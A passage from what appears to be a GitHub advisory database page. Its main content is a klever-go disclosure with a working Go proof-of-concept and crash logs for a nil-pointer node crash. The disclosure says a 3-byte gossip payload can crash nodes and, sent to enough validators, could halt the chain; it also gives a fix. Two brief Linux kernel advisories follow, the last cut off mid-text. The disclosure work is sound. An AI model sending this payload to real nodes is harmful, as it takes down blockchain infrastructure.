if err != nil {
t.Fatalf("marshal malicious tx: %v", err)
}
return buff
}
// pocTxFactory is a faithful copy of the production interceptedTxDataFactory.Create:
// it builds a genuine *InterceptedTransaction from the received bytes. No validation
// behavior is stubbed; only leaf crypto/marshal helpers use the repo's standard mocks.
type pocTxFactory struct{}
func (pocTxFactory) Create(buff []byte) (process.InterceptedData, error) {
m := &mock.ProtoMarshalizerMock{}
return txproc.NewInterceptedTransaction(&txproc.InterceptedTransactionArgs{
TxBuff: buff,
ProtoMarshalizer: m,
SignMarshalizer: m,
Hasher: mock.HasherMock{},
KeyGen: &cryptoMock.SingleSignKeyGenMock{},
Signer: &cryptoMock.SignerMock{SigSizeStub: func() int { return 64 }},
PubkeyConv: &mock.PubkeyConverterStub{LenCalled: func() int { return 32 }},
WhiteListerVerifiedTxs: &mock.WhiteListHandlerStub{},
ChainID: []byte("chainID"),
TxSignHasher: mock.HasherMock{},
FeeHandler: &mock.FeeHandlerStub{
CheckValidityTxValuesCalled: func(tx process.TransactionWithFeeHandler) (*dataTransaction.CostResponse, error) {
return &dataTransaction.CostResponse{}, nil
},
},
TxVersionChecker: versioning.NewTxVersionChecker(0),
ForkController: &mock.ForkControllerStub{},
})
}
func (pocTxFactory) IsInterfaceNil() bool { return false }
// TestPoC_NilRawData_MultiDataInterceptor exercises the EXACT production path for the
// "transactions" gossip topic, which is served by a MultiDataInterceptor (see
// core/process/factory/interceptorscontainer/baseInterceptorsContainerFactory.go,
// func createOneTxInterceptor).
func TestPoC_NilRawData_MultiDataInterceptor(t *testing.T) {
protoMarsh := &mock.ProtoMarshalizerMock{}
// Wrap the single malicious tx in a Batch, exactly like a bulk-tx gossip message.
b := &batch.Batch{Data: [][]byte{buildMaliciousTxBytes(t)}}
batchBytes, err := protoMarsh.Marshal(b)
if err != nil {
t.Fatalf("marshal batch: %v", err)
}
th, _ := throttler.NewNumGoRoutinesThrottler(5)
mdi, err := interceptors.NewMultiDataInterceptor(interceptors.ArgMultiDataInterceptor{
Topic: "transactions",
Marshalizer: protoMarsh,
DataFactory: pocTxFactory{},
Processor: &mock.InterceptorProcessorStub{},
Throttler: th,
AntifloodHandler: &mock.P2PAntifloodHandlerStub{},
WhiteListRequest: &mock.WhiteListHandlerStub{},
CurrentPeerID: core.PeerID("self"),
})
if err != nil {
t.Fatalf("build interceptor: %v", err)
}
msg := &mock.P2PMessageMock{
DataField: batchBytes,
TopicField: "transactions",
PeerField: core.PeerID("attacker"),
}
// In production this is called by the libp2p pubsub callback, which has no recover().
// The nil-pointer panic therefore propagates and crashes the node process.
_ = mdi.ProcessReceivedMessage(msg, core.PeerID("attacker"))
// Only reached if the bug is fixed (CheckTxVersion guards a nil RawData).
t.Log("no panic: node survived -> NOT vulnerable")
}
// TestPoC_NilRawData_SingleDataInterceptor shows the same crash via the generic
// single-item interceptor path, demonstrating the bug is in the shared validation
// chain, not in one interceptor variant.
func TestPoC_NilRawData_SingleDataInterceptor(t *testing.T) {
th, _ := throttler.NewNumGoRoutinesThrottler(5)
sdi, err := interceptors.NewSingleDataInterceptor(interceptors.ArgSingleDataInterceptor{
Topic: "transactions",
DataFactory: pocTxFactory{},
Processor: &mock.InterceptorProcessorStub{},
Throttler: th,
AntifloodHandler: &mock.P2PAntifloodHandlerStub{},
WhiteListRequest: &mock.WhiteListHandlerStub{},
CurrentPeerID: core.PeerID("self"),
})
if err != nil {
t.Fatalf("build interceptor: %v", err)
}
msg := &mock.P2PMessageMock{
DataField: buildMaliciousTxBytes(t),
TopicField: "transactions",
PeerField: core.PeerID("attacker"),
}
_ = sdi.ProcessReceivedMessage(msg, core.PeerID("attacker"))
t.Log("no panic: node survived -> NOT vulnerable")
}
PoC-Results
Result A - production MultiDataInterceptor (the transactions gossip topic):
$ go test ./core/process/interceptors/ -run TestPoC_NilRawData_MultiDataInterceptor -v
=== RUN TestPoC_NilRawData_MultiDataInterceptor
--- FAIL: TestPoC_NilRawData_MultiDataInterceptor (0.00s)
panic: runtime error: invalid memory address or nil pointer dereference [recovered, repanicked]
[signal SIGSEGV: segmentation violation code=0x1 addr=0x70 pc=0x7b7be4]
goroutine 8 [running]:
panic({0x888c00?, 0xd54d60?})
/usr/lib/go-1.26/src/runtime/panic.go:860 +0x13a
github.com/klever-io/klever-go/core/versioning.(*txVersionChecker).CheckTxVersion(0x7?, 0x7?)
.../core/versioning/txVersionChecker.go:22 +0x4
github.com/klever-io/klever-go/core/process/transaction.(*InterceptedTransaction).integrity(...)
.../core/process/transaction/interceptedTransaction.go:203 +0x31
github.com/klever-io/klever-go/core/process/transaction.(*InterceptedTransaction).CheckValidity(...)
.../core/process/transaction/interceptedTransaction.go:154 +0x13
github.com/klever-io/klever-go/core/process/interceptors.(*MultiDataInterceptor).interceptedData(...)
.../core/process/interceptors/multiDataInterceptor.go:223 +0x9c
github.com/klever-io/klever-go/core/process/interceptors.(*MultiDataInterceptor).ProcessReceivedMessage(...)
.../core/process/interceptors/multiDataInterceptor.go:171 +0x7ca
github.com/klever-io/klever-go/core/process/interceptors_test.TestPoC_NilRawData_MultiDataInterceptor(...)
.../core/process/interceptors/poc_nil_rawdata_dos_test.go:135 +0x3ef
FAIL github.com/klever-io/klever-go/core/process/interceptors 0.005s
FAIL
Result B - generic SingleDataInterceptor (same root cause via the shared chain):
$ go test ./core/process/interceptors/ -run TestPoC_NilRawData_SingleDataInterceptor -v
=== RUN TestPoC_NilRawData_SingleDataInterceptor
--- FAIL: TestPoC_NilRawData_SingleDataInterceptor (0.00s)
panic: runtime error: invalid memory address or nil pointer dereference [recovered, repanicked]
[signal SIGSEGV: segmentation violation code=0x1 addr=0x70 pc=0x7b7be4]
goroutine 8 [running]:
panic({0x888c00?, 0xd54d60?})
/usr/lib/go-1.26/src/runtime/panic.go:860 +0x13a
github.com/klever-io/klever-go/core/versioning.(*txVersionChecker).CheckTxVersion(0x7?, 0x7?)
.../core/versioning/txVersionChecker.go:22 +0x4
github.com/klever-io/klever-go/core/process/transaction.(*InterceptedTransaction).integrity(...)
.../core/process/transaction/interceptedTransaction.go:203 +0x31
github.com/klever-io/klever-go/core/process/transaction.(*InterceptedTransaction).CheckValidity(...)
.../core/process/transaction/interceptedTransaction.go:154 +0x13
github.com/klever-io/klever-go/core/process/interceptors.(*SingleDataInterceptor).ProcessReceivedMessage(...)
.../core/process/interceptors/singleDataInterceptor.go:118 +0x12e
github.com/klever-io/klever-go/core/process/interceptors_test.TestPoC_NilRawData_SingleDataInterceptor(...)
.../core/process/interceptors/poc_nil_rawdata_dos_test.go:165 +0x2b1
FAIL github.com/klever-io/klever-go/core/process/interceptors 0.005s
FAIL
Interpretation
- Both runs abort the process with SIGSEGV originating at txVersionChecker.go:22
(tx.RawData.Version), reached through the real interceptor's synchronous
ProcessReceivedMessage frame - the exact frame the recover-free libp2p pubsub
callback executes in production. A recover()-less crash here = full node process exit.
- Round-trip check (production tools/marshal.ProtoMarshalizer): the malicious tx is
3 bytes 12 01 78 and decodes to RawData == nil, confirming the trigger is a
valid, attacker-craftable wire message (not a malformed blob rejected earlier).
Suggested fix
Primary (root cause) - make CheckTxVersion nil-safe / reject RawData == nil early:
func (tvc *txVersionChecker) CheckTxVersion(tx *transaction.Transaction) error {
if tx == nil || tx.RawData == nil {
return process.ErrInvalidTransactionVersion
}
if tx.RawData.Version < tvc.minTxVersion {
return process.ErrInvalidTransactionVersion
}
return nil
}
Returning a sentinel error here is already handled by the interceptors (they blacklist peers that send wrong-version transactions).
Defense-in-depth:
- Wrap the synchronous body of pubsubCallback (and/or ProcessReceivedMessage) in a
recover() so a single malformed message can never abort the process.
- Audit the other direct inTx.tx.RawData.* dereferences in
interceptedTransaction.go (chainID/sender/contract/nonce/fee getters) for the same
nil-input class.
Duplicate check (vs published advisories)
Checked against the 3 published advisories (GHSA-jc6w-wmfc-fh33 / CVE-2026-46403,
GHSA-87m7-qffr-542v / CVE-2026-44697, GHSA-74m6-4hjp-7226). This is NOT a duplicate:
different root cause (nil RawData deref vs gzip OOM / throttler accounting / VM
read-only isolation); the advisory texts never mention RawData, CheckTxVersion,
txVersionChecker, or any nil/NULL deref. Those three advisories' fixes are already
present in the reviewed tree, yet txVersionChecker.go:22 remains unpatched. It is
adjacent in impact class (P2P interceptor DoS) to 87m7 / 74m6, referenced here for context.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.7.17"
},
"package": {
"ecosystem": "Go",
"name": "github.com/klever-io/klever-go"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.14"
},
{
"fixed": "1.7.18"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-52878"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-05T16:42:38Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\nEvery transaction gossiped on the klever-go P2P network is decoded and validated\nsynchronously inside the libp2p pubsub topic-validator callback. The validator\n`txVersionChecker.CheckTxVersion` dereferences `tx.RawData.Version` with no nil\ncheck. A protobuf `Transaction` whose embedded `RawData` sub-message is omitted\ndecodes to `RawData == nil`, so validating it triggers a nil-pointer panic.\n\nThe libp2p pubsub callback, the underlying go-libp2p-pubsub validation worker, and\nklever\u0027s own `network/p2p` layer install no `recover()`, so the panic propagates and\ncrashes the entire node process. The attacker payload is a 3-byte protobuf message;\nno validator key, stake, funds, or on-chain account is required. Aimed at enough of\nthe BLS validator set, repeated delivery halts block production (chain halt).\n\n## Affected component\n- Root cause: `core/versioning/txVersionChecker.go:22`\n- Reached via: `core/process/transaction/interceptedTransaction.go:203` (integrity) and `:154` (CheckValidity)\n- Production tx-topic path: `core/process/interceptors/multiDataInterceptor.go:171` and `:223`\n- Unprotected caller: `network/p2p/libp2p/netMessenger.go` `pubsubCallback` (no recover)\n- Topic wiring: `core/process/factory/interceptorscontainer/baseInterceptorsContainerFactory.go` (`createOneTxInterceptor`)\n\n## Details\nSynchronous validation path, no recovery at any frame:\n\n```\nlibp2p pubsubCallback network/p2p/libp2p/netMessenger.go (no recover)\n -\u003e MultiDataInterceptor.ProcessReceivedMessage core/process/interceptors/multiDataInterceptor.go:171\n -\u003e interceptedData(...) core/process/interceptors/multiDataInterceptor.go:223\n -\u003e InterceptedTransaction.CheckValidity core/process/transaction/interceptedTransaction.go:154\n -\u003e integrity() core/process/transaction/interceptedTransaction.go:203\n -\u003e txVersionChecker.CheckTxVersion(tx) core/versioning/txVersionChecker.go:22 \u003c-- nil deref\n```\n\nRoot cause (`core/versioning/txVersionChecker.go`):\n```go\nfunc (tvc *txVersionChecker) CheckTxVersion(tx *transaction.Transaction) error {\n\tif tx.RawData.Version \u003c tvc.minTxVersion { // tx.RawData is nil -\u003e panic\n\t\treturn process.ErrInvalidTransactionVersion\n\t}\n\treturn nil\n}\n```\n\n`integrity()` calls `CheckTxVersion` as its very first statement, before any\n`RawData` nil-check, and `CheckValidity()` runs before the whitelist / originator-\nelection gate in the interceptor, so node-role and whitelist restrictions do not\nprotect this path.\n\n## Preconditions\n- Attacker runs an ordinary libp2p peer reachable to the target via normal peering /\n kad-dht discovery on the `transactions` gossip topic.\n- Production runs with `withMessageSigning = true`, which only requires the gossip\n message to be signed by the attacker\u0027s OWN libp2p peer key (a self-generated\n identity; NOT a validator key, NOT funded, NOT authorized).\n- No special config or feature flag; the tx interceptor is built unconditionally and\n subscribes to `transactions` on every node.\n\n## Impact\n- Deterministic, immediate crash of any targeted node (validator, sentry, or\n observer) from a single ~3-byte message.\n- Gossipsub validates before relaying, so the victim does not forward the crashing\n message; the attacker delivers it directly to each target (one tiny message/node).\n- With auto-restart (systemd), re-sending sustains the outage.\n- Directed at \u003e 1/3 of the BLS validator set, this prevents consensus and halts the chain.\n- NOTE: the HTTP `POST /transaction/send` path is NOT crash-exploitable - the REST\n server uses `gin.Default()` (Recovery middleware) and returns HTTP 500. The\n exploitable vector is the P2P interceptor.\n\n## Exploit cost / attack complexity\n- Cost: negligible (one self-signed libp2p peer; 3-byte payload; no gas/capital).\n- Complexity: LOW. Unauthenticated, remote, deterministic.\n\n## PoC-Source\n\nScenario\n- Build the malicious transaction as it appears on the wire: a protobuf `Transaction`\n with `RawData` omitted (plus a throwaway `Signature` so the batch entry looks like a\n real tx). With the production proto marshalizer this encodes to 3 bytes\n (`12 01 78`) and round-trips back to `RawData == nil`.\n- Feed it through the REAL production interceptors. The `transactions` gossip topic is\n served by a `MultiDataInterceptor` (`baseInterceptorsContainerFactory.go`,\n `createOneTxInterceptor`); the test wraps the tx in a `Batch` exactly like a bulk-tx\n gossip message and calls `ProcessReceivedMessage`, which is precisely what the\n panic-free libp2p `pubsubCallback` invokes in production. A second test drives the\n generic `SingleDataInterceptor` to show the bug is in the shared validation chain.\n- The data factory is a faithful copy of the production `interceptedTxDataFactory.Create`:\n it builds a genuine `*InterceptedTransaction`. No validation behavior is stubbed;\n only leaf crypto/marshal helpers use the repo\u0027s own in-tree mocks. The panic occurs\n on the first line of `integrity()`, upstream of any mock.\n\nHow to run\n1. `git clone https://github.com/klever-io/klever-go \u0026\u0026 cd klever-go`\n (Go toolchain matching go.mod `go 1.25.7`; verified locally on go1.26.3.)\n2. Save the source below as `core/process/interceptors/poc_nil_rawdata_dos_test.go`.\n3. Run either (separately - the first panic aborts the test binary):\n - Production tx-topic path: `go test ./core/process/interceptors/ -run TestPoC_NilRawData_MultiDataInterceptor -v`\n - Generic path: `go test ./core/process/interceptors/ -run TestPoC_NilRawData_SingleDataInterceptor -v`\n- Dependencies: none beyond the repo\u0027s own go.mod (uses in-repo mocks only).\n\nFull PoC source (`poc_nil_rawdata_dos_test.go`):\n\n```go\n// Target component: klever-go P2P transaction interceptor (network availability)\n// core/process/transaction/interceptedTransaction.go\n// core/versioning/txVersionChecker.go:22\n// Vulnerability type: Unauthenticated remote Denial-of-Service (nil-pointer panic / chain-wide node crash)\n// CWE-476 (NULL Pointer Dereference) reached from untrusted P2P input.\n//\n// Summary:\n// Every gossiped transaction is decoded and validated synchronously inside the\n// libp2p pubsub topic-validator callback\n// (network/p2p/libp2p/netMessenger.go -\u003e pubsubCallback). That callback has NO\n// recover(). The validation chain is:\n//\n// (Multi|Single)DataInterceptor.ProcessReceivedMessage\n// -\u003e InterceptedTransaction.CheckValidity\n// -\u003e integrity()\n// -\u003e txVersionChecker.CheckTxVersion(tx) // tx.RawData.Version \u003c-- nil deref\n//\n// CheckTxVersion dereferences tx.RawData.Version with no nil guard. A protobuf\n// Transaction whose embedded RawData message is omitted unmarshals fine (RawData==nil),\n// so an unauthenticated peer can broadcast a few bytes that panic the validation\n// goroutine and crash the entire node process. Repeating it against the validator\n// set halts consensus.\n//\n// How to run:\n// 1) git clone https://github.com/klever-io/klever-go \u0026\u0026 cd klever-go\n// 2) cp \u003cthis file\u003e core/process/interceptors/poc_nil_rawdata_dos_test.go\n// 3) go test ./core/process/interceptors/ -run TestPoC_NilRawData -v\n//\n// Expected output:\n// The test process aborts with:\n// panic: runtime error: invalid memory address or nil pointer dereference\n// ... core/versioning.(*txVersionChecker).CheckTxVersion ... txVersionChecker.go:22\n// ... InterceptedTransaction.integrity ... -\u003e CheckValidity\n// ... (Multi|Single)DataInterceptor.ProcessReceivedMessage\n// i.e. the crash originates from the interceptor\u0027s synchronous message-handling frame,\n// exactly where the panic-free libp2p pubsub callback would call it in production.\n//\n// Dependencies: none beyond the repo\u0027s own go.mod (uses in-repo mocks only).\n\npackage interceptors_test\n\nimport (\n\t\"testing\"\n\n\t\"github.com/klever-io/klever-go/common/mock\"\n\t\"github.com/klever-io/klever-go/core\"\n\t\"github.com/klever-io/klever-go/core/process\"\n\t\"github.com/klever-io/klever-go/core/process/interceptors\"\n\ttxproc \"github.com/klever-io/klever-go/core/process/transaction\"\n\t\"github.com/klever-io/klever-go/core/throttler\"\n\t\"github.com/klever-io/klever-go/core/versioning\"\n\tcryptoMock \"github.com/klever-io/klever-go/crypto/mock\"\n\t\"github.com/klever-io/klever-go/data/batch\"\n\tdataTransaction \"github.com/klever-io/klever-go/data/transaction\"\n)\n\n// buildMaliciousTxBytes returns the proto wire-bytes of a Transaction whose RawData\n// field is omitted. This is the entire attacker payload.\nfunc buildMaliciousTxBytes(t *testing.T) []byte {\n\tm := \u0026mock.ProtoMarshalizerMock{}\n\tmaliciousTx := \u0026dataTransaction.Transaction{ /* RawData: nil */ }\n\tbuff, err := m.Marshal(maliciousTx)\n\tif err != nil {\n\t\tt.Fatalf(\"marshal malicious tx: %v\", err)\n\t}\n\treturn buff\n}\n\n// pocTxFactory is a faithful copy of the production interceptedTxDataFactory.Create:\n// it builds a genuine *InterceptedTransaction from the received bytes. No validation\n// behavior is stubbed; only leaf crypto/marshal helpers use the repo\u0027s standard mocks.\ntype pocTxFactory struct{}\n\nfunc (pocTxFactory) Create(buff []byte) (process.InterceptedData, error) {\n\tm := \u0026mock.ProtoMarshalizerMock{}\n\treturn txproc.NewInterceptedTransaction(\u0026txproc.InterceptedTransactionArgs{\n\t\tTxBuff: buff,\n\t\tProtoMarshalizer: m,\n\t\tSignMarshalizer: m,\n\t\tHasher: mock.HasherMock{},\n\t\tKeyGen: \u0026cryptoMock.SingleSignKeyGenMock{},\n\t\tSigner: \u0026cryptoMock.SignerMock{SigSizeStub: func() int { return 64 }},\n\t\tPubkeyConv: \u0026mock.PubkeyConverterStub{LenCalled: func() int { return 32 }},\n\t\tWhiteListerVerifiedTxs: \u0026mock.WhiteListHandlerStub{},\n\t\tChainID: []byte(\"chainID\"),\n\t\tTxSignHasher: mock.HasherMock{},\n\t\tFeeHandler: \u0026mock.FeeHandlerStub{\n\t\t\tCheckValidityTxValuesCalled: func(tx process.TransactionWithFeeHandler) (*dataTransaction.CostResponse, error) {\n\t\t\t\treturn \u0026dataTransaction.CostResponse{}, nil\n\t\t\t},\n\t\t},\n\t\tTxVersionChecker: versioning.NewTxVersionChecker(0),\n\t\tForkController: \u0026mock.ForkControllerStub{},\n\t})\n}\nfunc (pocTxFactory) IsInterfaceNil() bool { return false }\n\n// TestPoC_NilRawData_MultiDataInterceptor exercises the EXACT production path for the\n// \"transactions\" gossip topic, which is served by a MultiDataInterceptor (see\n// core/process/factory/interceptorscontainer/baseInterceptorsContainerFactory.go,\n// func createOneTxInterceptor).\nfunc TestPoC_NilRawData_MultiDataInterceptor(t *testing.T) {\n\tprotoMarsh := \u0026mock.ProtoMarshalizerMock{}\n\n\t// Wrap the single malicious tx in a Batch, exactly like a bulk-tx gossip message.\n\tb := \u0026batch.Batch{Data: [][]byte{buildMaliciousTxBytes(t)}}\n\tbatchBytes, err := protoMarsh.Marshal(b)\n\tif err != nil {\n\t\tt.Fatalf(\"marshal batch: %v\", err)\n\t}\n\n\tth, _ := throttler.NewNumGoRoutinesThrottler(5)\n\tmdi, err := interceptors.NewMultiDataInterceptor(interceptors.ArgMultiDataInterceptor{\n\t\tTopic: \"transactions\",\n\t\tMarshalizer: protoMarsh,\n\t\tDataFactory: pocTxFactory{},\n\t\tProcessor: \u0026mock.InterceptorProcessorStub{},\n\t\tThrottler: th,\n\t\tAntifloodHandler: \u0026mock.P2PAntifloodHandlerStub{},\n\t\tWhiteListRequest: \u0026mock.WhiteListHandlerStub{},\n\t\tCurrentPeerID: core.PeerID(\"self\"),\n\t})\n\tif err != nil {\n\t\tt.Fatalf(\"build interceptor: %v\", err)\n\t}\n\n\tmsg := \u0026mock.P2PMessageMock{\n\t\tDataField: batchBytes,\n\t\tTopicField: \"transactions\",\n\t\tPeerField: core.PeerID(\"attacker\"),\n\t}\n\n\t// In production this is called by the libp2p pubsub callback, which has no recover().\n\t// The nil-pointer panic therefore propagates and crashes the node process.\n\t_ = mdi.ProcessReceivedMessage(msg, core.PeerID(\"attacker\"))\n\n\t// Only reached if the bug is fixed (CheckTxVersion guards a nil RawData).\n\tt.Log(\"no panic: node survived -\u003e NOT vulnerable\")\n}\n\n// TestPoC_NilRawData_SingleDataInterceptor shows the same crash via the generic\n// single-item interceptor path, demonstrating the bug is in the shared validation\n// chain, not in one interceptor variant.\nfunc TestPoC_NilRawData_SingleDataInterceptor(t *testing.T) {\n\tth, _ := throttler.NewNumGoRoutinesThrottler(5)\n\tsdi, err := interceptors.NewSingleDataInterceptor(interceptors.ArgSingleDataInterceptor{\n\t\tTopic: \"transactions\",\n\t\tDataFactory: pocTxFactory{},\n\t\tProcessor: \u0026mock.InterceptorProcessorStub{},\n\t\tThrottler: th,\n\t\tAntifloodHandler: \u0026mock.P2PAntifloodHandlerStub{},\n\t\tWhiteListRequest: \u0026mock.WhiteListHandlerStub{},\n\t\tCurrentPeerID: core.PeerID(\"self\"),\n\t})\n\tif err != nil {\n\t\tt.Fatalf(\"build interceptor: %v\", err)\n\t}\n\n\tmsg := \u0026mock.P2PMessageMock{\n\t\tDataField: buildMaliciousTxBytes(t),\n\t\tTopicField: \"transactions\",\n\t\tPeerField: core.PeerID(\"attacker\"),\n\t}\n\n\t_ = sdi.ProcessReceivedMessage(msg, core.PeerID(\"attacker\"))\n\tt.Log(\"no panic: node survived -\u003e NOT vulnerable\")\n}\n```\n\n## PoC-Results\n\nResult A - production `MultiDataInterceptor` (the `transactions` gossip topic):\n```\n$ go test ./core/process/interceptors/ -run TestPoC_NilRawData_MultiDataInterceptor -v\n=== RUN TestPoC_NilRawData_MultiDataInterceptor\n--- FAIL: TestPoC_NilRawData_MultiDataInterceptor (0.00s)\npanic: runtime error: invalid memory address or nil pointer dereference [recovered, repanicked]\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x70 pc=0x7b7be4]\n\ngoroutine 8 [running]:\npanic({0x888c00?, 0xd54d60?})\n /usr/lib/go-1.26/src/runtime/panic.go:860 +0x13a\ngithub.com/klever-io/klever-go/core/versioning.(*txVersionChecker).CheckTxVersion(0x7?, 0x7?)\n .../core/versioning/txVersionChecker.go:22 +0x4\ngithub.com/klever-io/klever-go/core/process/transaction.(*InterceptedTransaction).integrity(...)\n .../core/process/transaction/interceptedTransaction.go:203 +0x31\ngithub.com/klever-io/klever-go/core/process/transaction.(*InterceptedTransaction).CheckValidity(...)\n .../core/process/transaction/interceptedTransaction.go:154 +0x13\ngithub.com/klever-io/klever-go/core/process/interceptors.(*MultiDataInterceptor).interceptedData(...)\n .../core/process/interceptors/multiDataInterceptor.go:223 +0x9c\ngithub.com/klever-io/klever-go/core/process/interceptors.(*MultiDataInterceptor).ProcessReceivedMessage(...)\n .../core/process/interceptors/multiDataInterceptor.go:171 +0x7ca\ngithub.com/klever-io/klever-go/core/process/interceptors_test.TestPoC_NilRawData_MultiDataInterceptor(...)\n .../core/process/interceptors/poc_nil_rawdata_dos_test.go:135 +0x3ef\nFAIL github.com/klever-io/klever-go/core/process/interceptors 0.005s\nFAIL\n```\n\nResult B - generic `SingleDataInterceptor` (same root cause via the shared chain):\n```\n$ go test ./core/process/interceptors/ -run TestPoC_NilRawData_SingleDataInterceptor -v\n=== RUN TestPoC_NilRawData_SingleDataInterceptor\n--- FAIL: TestPoC_NilRawData_SingleDataInterceptor (0.00s)\npanic: runtime error: invalid memory address or nil pointer dereference [recovered, repanicked]\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x70 pc=0x7b7be4]\n\ngoroutine 8 [running]:\npanic({0x888c00?, 0xd54d60?})\n /usr/lib/go-1.26/src/runtime/panic.go:860 +0x13a\ngithub.com/klever-io/klever-go/core/versioning.(*txVersionChecker).CheckTxVersion(0x7?, 0x7?)\n .../core/versioning/txVersionChecker.go:22 +0x4\ngithub.com/klever-io/klever-go/core/process/transaction.(*InterceptedTransaction).integrity(...)\n .../core/process/transaction/interceptedTransaction.go:203 +0x31\ngithub.com/klever-io/klever-go/core/process/transaction.(*InterceptedTransaction).CheckValidity(...)\n .../core/process/transaction/interceptedTransaction.go:154 +0x13\ngithub.com/klever-io/klever-go/core/process/interceptors.(*SingleDataInterceptor).ProcessReceivedMessage(...)\n .../core/process/interceptors/singleDataInterceptor.go:118 +0x12e\ngithub.com/klever-io/klever-go/core/process/interceptors_test.TestPoC_NilRawData_SingleDataInterceptor(...)\n .../core/process/interceptors/poc_nil_rawdata_dos_test.go:165 +0x2b1\nFAIL github.com/klever-io/klever-go/core/process/interceptors 0.005s\nFAIL\n```\n\nInterpretation\n- Both runs abort the process with SIGSEGV originating at `txVersionChecker.go:22`\n (`tx.RawData.Version`), reached through the real interceptor\u0027s synchronous\n `ProcessReceivedMessage` frame - the exact frame the recover-free libp2p pubsub\n callback executes in production. A recover()-less crash here = full node process exit.\n- Round-trip check (production `tools/marshal.ProtoMarshalizer`): the malicious tx is\n 3 bytes `12 01 78` and decodes to `RawData == nil`, confirming the trigger is a\n valid, attacker-craftable wire message (not a malformed blob rejected earlier).\n\n## Suggested fix\nPrimary (root cause) - make `CheckTxVersion` nil-safe / reject `RawData == nil` early:\n```go\nfunc (tvc *txVersionChecker) CheckTxVersion(tx *transaction.Transaction) error {\n\tif tx == nil || tx.RawData == nil {\n\t\treturn process.ErrInvalidTransactionVersion\n\t}\n\tif tx.RawData.Version \u003c tvc.minTxVersion {\n\t\treturn process.ErrInvalidTransactionVersion\n\t}\n\treturn nil\n}\n```\nReturning a sentinel error here is already handled by the interceptors (they\nblacklist peers that send wrong-version transactions).\n\nDefense-in-depth:\n- Wrap the synchronous body of `pubsubCallback` (and/or `ProcessReceivedMessage`) in a\n `recover()` so a single malformed message can never abort the process.\n- Audit the other direct `inTx.tx.RawData.*` dereferences in\n `interceptedTransaction.go` (chainID/sender/contract/nonce/fee getters) for the same\n nil-input class.\n\n## Duplicate check (vs published advisories)\nChecked against the 3 published advisories (GHSA-jc6w-wmfc-fh33 / CVE-2026-46403,\nGHSA-87m7-qffr-542v / CVE-2026-44697, GHSA-74m6-4hjp-7226). This is NOT a duplicate:\ndifferent root cause (nil `RawData` deref vs gzip OOM / throttler accounting / VM\nread-only isolation); the advisory texts never mention `RawData`, `CheckTxVersion`,\n`txVersionChecker`, or any nil/NULL deref. Those three advisories\u0027 fixes are already\npresent in the reviewed tree, yet `txVersionChecker.go:22` remains unpatched. It is\nadjacent in impact class (P2P interceptor DoS) to 87m7 / 74m6, referenced here for context.",
"id": "GHSA-rm5c-5x2p-48wr",
"modified": "2026-06-09T18:40:35Z",
"published": "2026-06-05T16:42:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/klever-io/klever-go/security/advisories/GHSA-rm5c-5x2p-48wr"
},
{
"type": "PACKAGE",
"url": "https://github.com/klever-io/klever-go"
},
{
"type": "WEB",
"url": "https://github.com/klever-io/klever-go/releases/tag/v1.7.18"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Klever-Go KVM: Unauthenticated remote node crash (nil-pointer DoS) in klever-go P2P transaction interceptor (txVersionChecker nil RawData) - potential chain halt"
}
GHSA-RM62-4X72-VWWP
Vulnerability from github – Published: 2022-05-06 00:00 – Updated: 2023-06-27 18:30A NULL pointer dereference flaw was found in the Linux kernel’s X.25 set of standardized network protocols functionality in the way a user terminates their session using a simulated Ethernet card and continued usage of this connection. This flaw allows a local user to crash the system.
{
"affected": [],
"aliases": [
"CVE-2022-1516"
],
"database_specific": {
"cwe_ids": [
"CWE-416",
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-05T15:15:00Z",
"severity": "MODERATE"
},
"details": "A NULL pointer dereference flaw was found in the Linux kernel\u2019s X.25 set of standardized network protocols functionality in the way a user terminates their session using a simulated Ethernet card and continued usage of this connection. This flaw allows a local user to crash the system.",
"id": "GHSA-rm62-4x72-vwwp",
"modified": "2023-06-27T18:30:24Z",
"published": "2022-05-06T00:00:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1516"
},
{
"type": "WEB",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=7781607938c8"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2022/dsa-5173"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/06/19/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RMFF-FQQ9-PC3Q
Vulnerability from github – Published: 2024-06-10 15:31 – Updated: 2024-09-05 18:30In the Linux kernel, the following vulnerability has been resolved:
af_unix: Update unix_sk(sk)->oob_skb under sk_receive_queue lock.
Billy Jheng Bing-Jhong reported a race between __unix_gc() and queue_oob().
__unix_gc() tries to garbage-collect close()d inflight sockets, and then if the socket has MSG_OOB in unix_sk(sk)->oob_skb, GC will drop the reference and set NULL to it locklessly.
However, the peer socket still can send MSG_OOB message and queue_oob() can update unix_sk(sk)->oob_skb concurrently, leading NULL pointer dereference. [0]
To fix the issue, let's update unix_sk(sk)->oob_skb under the sk_receive_queue's lock and take it everywhere we touch oob_skb.
Note that we defer kfree_skb() in manage_oob() to silence lockdep false-positive (See [1]).
